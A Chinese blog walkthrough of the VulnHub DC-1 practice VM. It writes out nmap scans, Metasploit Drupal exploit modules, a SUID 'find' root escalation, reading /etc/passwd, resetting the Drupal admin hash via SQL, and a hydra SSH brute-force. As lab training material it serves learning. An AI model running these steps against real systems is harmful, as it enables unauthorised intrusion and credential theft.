vulnhub DC-1靶机 walkthrough

最新推荐文章于 2026-06-17 07:29:58 发布
原创 最新推荐文章于 2026-06-17 07:29:58 发布 · 1.9k 阅读 · 8 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#安全 #网络 #web安全 #linux

描述

DC-1 是专门为获得渗透测试经验而建造的易受攻击实验室。
它旨在成为初学者的挑战,但其难易程度取决于您的技能和知识以及学习能力。
要成功完成此挑战,您需要具备 Linux 技能、熟悉 Linux 命令行以及使用基本渗透测试工具的经验,例如 Kali Linux 或 Parrot Security OS 上的工具。
获得 root 权限的方法有很多种,但我提供了一些包含初学者线索的标志。
总共有五个标志,但最终目标是在 root 的主目录中找到并读取该标志。您甚至不需要成为 root 即可执行此操作,但是您需要 root 权限。
根据您的技能水平,您可能可以跳过查找大多数这些标志的过程,直接获得 root 权限。
初学者可能会遇到以前从未遇到过的挑战,但只需进行 Google 搜索即可获得完成此挑战所需的信息。

实验

先扫描
arp-scan -l
nmap -p- -A 192.168.110.131
在这里插入图片描述
访问 web 服务
在这里插入图片描述
Drupal 是一个开源的内容管理系统(CMS),用于构建和管理网站及应用程序。它基于 PHP 编写,具有高度灵活性和可扩展性,适用于从个人博客到企业级网站的各种项目。
指纹识别一下(用的 Wappalyzer 浏览器插件,也可以用 kali 的 whatweb 工具)
在这里插入图片描述
拿到 CMS Drupal 版本为 7,找漏打一下
msfconsole
search Drupal
在这里插入图片描述
试一下前两个
use exploit/unix/webapp/drupal_coder_exec
show options
在这里插入图片描述
set RHOST 192.168.110.131
run
在这里插入图片描述
试一下第二个 exp,重复上面操作
在这里插入图片描述
获得了一个非交互式 shell
在这里插入图片描述
python -c 'import pty;pty.spawn("/bin/bash")'获得了交互式 shell
找到去 flag1.txt

www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.

搜一下 Drupal 配置文件
在这里插入图片描述
全局查找 settings.php
find / -name settings.php
在这里插入图片描述
找到 flag2.txt
说爆破不是唯一获得许可的方式,结合下面的数据库账号密码,这里直接登录然后查找信息
这里因为我已经获得 shell 了,所以直接提权
尝试 suid 提权
find / -perm -4000 2>/dev/null 查找特权文件
在这里插入图片描述
结果 find 设置了 SUID 位,结合 find 的 -exec 参数,对其每个目录知执行 /bin/sh 获取到 root 权限。(/bin/bash 无效果)
在这里插入图片描述
提权成功
在这里插入图片描述
当然,其实中间还有一些其他 flag,下面补充一下
mysql -udbuser -p

show databases;
use drupaldb;
show tables;
show columns from users;

在这里插入图片描述
查出了经过某种算法加密后的账号密码
因为我们这里有数据库权限,所以能够修改密码,但需要知道对应的加密方法,因为处理端会解码。
全局搜索一下 hash passwd 等字眼
在这里插入图片描述
尝试利用这个加密脚本,对我们自己设的密码进行加密,我用 520
看看用法
在这里插入图片描述
/var/www/scripts/password-hash.sh

在这里插入图片描述
password: 520 hash: $S$DpIlEvnFz0QBFn51ZjGfwMVam98wY6riZSKNo4LIHX8LMjo/WXPC

再次登录数据库修改密码
update users set pass='$S$DpIlEvnFz0QBFn51ZjGfwMVam98wY6riZSKNo4LIHX8LMjo/WXPC' where name='admin';
可以看到密码成功修改,由于这是 drupal 的数据库用户信息,所以在 web 服务里直接登录
在这里插入图片描述
成功登录,并仪表盘(dashboard) 位置找到 flag3

在这里插入图片描述
在这里插入图片描述
这里大意就是要找 passwd,与 shadow 有关,且涉及权限。
那么就在 /etc/passwd/etc/shadow 里找一下密码
cat /etc/passwd
在这里插入图片描述
这里就看到了 flag4 用户,而密码保密在 /etc/shadow 下,普通用户无法查看
先尝试 kali hydra 爆破该用户 ssh 登录密码
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.110.131
在这里插入图片描述
以 flag4:orange ssh 连接登录
在这里插入图片描述
整个过程到此就结束了,flag4 最后提示以相同的方法获得 root 权限会比较困难,所以采用了 suid find 提权。

总结

  1. 扫描目标,获取 ip 和 服务信息。
  2. 登录 web 服务,指纹识别出 web 框架 Drupal 7
  3. msf 查找漏洞并利用,获取 shell
  4. suid find 提取获得 root

其他

  1. 查找配置文件获取数据库账号密码
  2. 登录,查看用户账号密码
  3. 查找密码加密文件,加密 520,修改 admin 密码,web登录
  4. 查找 Linux 上用户密码信息,找到 flag4用户
  5. hydra 爆破 ssh 密码,连接成功
Bulestar_xx
关注
01.快速上手.md
07-15
Django快速入手-1 讲解Django详情,安装,项目规划.....
md_app2:重建mdapp
02-18
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) 部署说明 ... md_app2
nmap常用命令
qq_43337502的博客
09-18 4519
nmap常用命令查看命令行帮助主机发现端口扫描系统扫描版本扫描综合扫描 查看命令行帮助 nmyp-btip 主机发现 nmap-n 192.168.199-0/24 端口扫描 nmap -sS -P1-1000 192.168.199.174 系统扫描 nmap -O 192.168.199.174 版本扫描 nmap -sV 192.168.199.174 综合扫描 nmap -A 192.168.199.174 ...
新手DC-1通关思路
SuchAprettyBoi的博客
08-10 789
文章目录前言一、DC-1是什么?二、准备流程1.要用到的工具2.初始化虚拟机3.开始前夕!!!三、开始渗透总结 前言 通关后,来复盘一下,顺便巩固一下学到的新东西 一、DC-1是什么? DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. DC-1 是一个特意建造的易受攻击的靶机环境,目的是在渗透测试领域获得经验。 It
kali 渗透DC:1
qq_50905066的博客
03-23 6786
首先我们从官网中下载DC1虚拟机,用VMware 打开即可。在开启DC:1之前记得设置网卡设置为nat模式,在完成之后,就可以开始渗透了。 第一步就是收集信息,我们使用kali的Namp工具来进行扫描就可以得到靶机的地址了。 如图: 我们排除过大的与过小的与本机的地址之后就可以确定靶机的地址了。 在确定地址之后可以使用端口扫描来查看靶机开启了那些服务。 如图: 扫描结果显示靶机开启了22,80,111,50202四个端口。既然开启了80端口,那么我们就先用浏览器查看靶机的http服务。..
下载blob视频/m3u8视频
熊猫七七的博客
05-11 1万+
安装360极速浏览器 在浏览器上安装扩展插件“猫抓” 3、安装成果以后,在浏览器右上角有个黄色小猫,打开你要下载的页面视频,让其播放 会看到小猫右下角有个数字在变动,点击小猫 打开的窗口找到一个后缀是.m3u8的文件,点击右侧的文件图标,复制链接 4、下载ffmpeg工具,解压缩 5、将ffmpeg的bin目录放到系统的环境变量path中 6、按下win+R键,打开dos窗口,输入 :ffmpeg -version 查看ffmpeg命令是否配置成果 7、在d...
md01和md02区别_Differences between MD01 and MD02.
weixin_31592801的博客
01-12 1604
Hi,1. Md01 is the MRP Run for plant by giving planning scope.2. Md02 is the mrp run for single Material from plant .Also refer following T code for your informationMenu NodesTransactionActivityMaster ...
vulnhub DC-3 靶机 walkthrough
Bulestardemon的博客
02-01 968
扫描主机,确定 ip 和 版本,服务信息。访问 web 服务,指纹识别,目录扫描。查找 cms joomla 漏洞,sqlmap 打了一发,以 admin 登录后台。找到文件上传或者修改点,部署 exp.php 反弹shell。获取 shell,查看内核和操作系统发行版本。找到 ubuntu 16.04 权限提升漏洞,获得 root。
VulnHub系列』DC: 9-Walkthrough
ins1ght的博客
01-14 1530
这是我完成的VulnHub上的第32个靶机靶机发布日期:2019年12月29日,难度:中等。标签:SQLi、“撞库”、LFI。
VulnHub系列』DC: 1-Walkthrough
ins1ght的博客
10-29 861
靶机发布日期:2019年2月28日,初级难度,共有5个flag,你拿全了吗?利用MSF中Drupal相关的模块直接getshell,SUID权限的find可执行文件直接提权。比较有意思的是flag3和flag5的获得方式,其他没啥。
No.32-VulnHub-DC:6-Walkthrough渗透学习
qq_34801745的博客
01-27 1149
** VulnHub-DC:6-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/dc-6,315/ 靶机难度:中级(CTF) 靶机发布日期:2019年4月26日 靶机描述: DC-6是基于Debian 64位构建的VirtualBox VM,但是在大多数PC上运行它应该没有任何问题。 我已经在VMWare Player上对此进行了测试,但是如果在...
migo获取header sap_Adjust Stock(MI06, MI07, MIGO)
weixin_39892800的博客
12-20 243
此APP对BSP支持如下:BSP名称:RT_STOCK_CORS1BSP包:RT_ST_ADJUST_STOCKBSP组件及版本:UIS4HOP1 200BSP运用地址:/sap/bc/ui5_ui5/sap/rt_stock_cors1APP使用行业:Oil and Gas,Retail,Telecommunications摘要:Adjust Stock allows you tocheck t...
VulnHub-LazySysAdmin: 1Walkthrough渗透学习
我是小小白的博客
07-07 442
VulnHub-LazySysAdmin: 1Walkthrough渗透学习 前言 靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip 靶机难度:中级(CTF) 靶机发布日期:2016年4月27日 靶机描述:这是SickOs的后续系列中的第二篇,并且与先前的发行版无关,挑战范围是在系统上获得最高特权。 目标:得到root权限&找到flag.txt 作者:我是小小白 时间:2021-07-06 请注意: 本博客所有文章,仅供研
【shell】bash: +%Y-%m-%d: command not found...
依旧的博客
12-24 7207
把整个value用反引号括起来就可以了 [root@znrmdapp1 ~]# date=date '+%Y-%m-%d' bash: +%Y-%m-%d: command not found... [root@znrmdapp1 ~]# date=`date '+%Y-%m-%d'` [root@znrmdapp1 ~]# echo $date 2020-12-18 [root@znrmdapp1 ~]#
什么是模型驱动应用(MDApp
企业应用探索日志
04-15 3万+
首先设定一个基本的讨论背景,如图1。它表现了模型驱动应用所处的典型情景,显示了信息技术(左侧)与业务(右侧)之间的鸿沟,包括它们各自的抽象层级系统(呈现为两个方向相反的金字塔)。模型驱动应用基于人可理解/操作且计算机可处理的中介模型,跨越鸿沟,对业务领域和计算机领域建立连接(参看Situation for Discussions about MDApps及此文)。本文将主要基于这一背景,对“模
靶机-SickOs 1.2 Walkthrough
banacyo14206的博客
08-22 394
SickOs:1.2 https://www.vulnhub.com/entry/sickos-12,144/ 参考:https://www.cnblogs.com/yuzly/p/10854392.html 提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409提权辅助工具linu...
DC使用入门
andylanzhiyong的博客
06-17 3997
本示例在View中 : void CDrawView::OnLButtonUp(UINT nFlags, CPoint point)  { // TODO: Add your message handler code here and/or call default //方式1: HDC hdc; hdc=::GetDC(m_hWnd); Mo
我又来分享来了,发现一个好的ide,免费的国产的,优秀的,自带md阅读器.那就是uni-app
热门推荐
个人进步之路
07-03 4万+
昨天发现的, uni-app,大家都去试试,好用啊.很快的,很小巧的.免费的.
【鸿蒙】HarmonyOS 安全:加密算法与 HUKS 密钥管理
Dengzm94
06-16 432
1.密钥永远不出 TEE:长期密钥必须通过 HUKS 管理,禁止用 cryptoFramework 生成后序列化存储2.GCM 模式 Nonce 必须随机且唯一:每次加密生成新随机 Nonce,与密文一起存储3.分段 API 处理大数据:超 64KB 数据必须用 init/update/finish 三段式4.密钥生成加幂等保护:生成前检查,避免覆盖旧密钥导致已加密数据丢失5.应用卸载清理密钥:主动调用避免残留密钥在重装后引发诡异错误核心结论。
AgentScope 2.0 源码解析-权限控制系统:从架构设计到安全实践
最新发布
program哲学
06-17 206
本文系统性拆解 AgentScope 2.0 框架的权限控制子系统,涵盖权限引擎(PermissionEngine)、权限上下文(PermissionContext)、权限决策(PermissionDecision)、权限规则(PermissionRule)四大核心组件。深入分析五种权限模式(DEFAULT、ACCEPT_EDITS、EXPLORE、BYPASS、DONT_ASK)与四种决策行为(ALLOW、DENY、ASK、PASSTHROUGH)的设计原理,详解六步优先级决策流程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值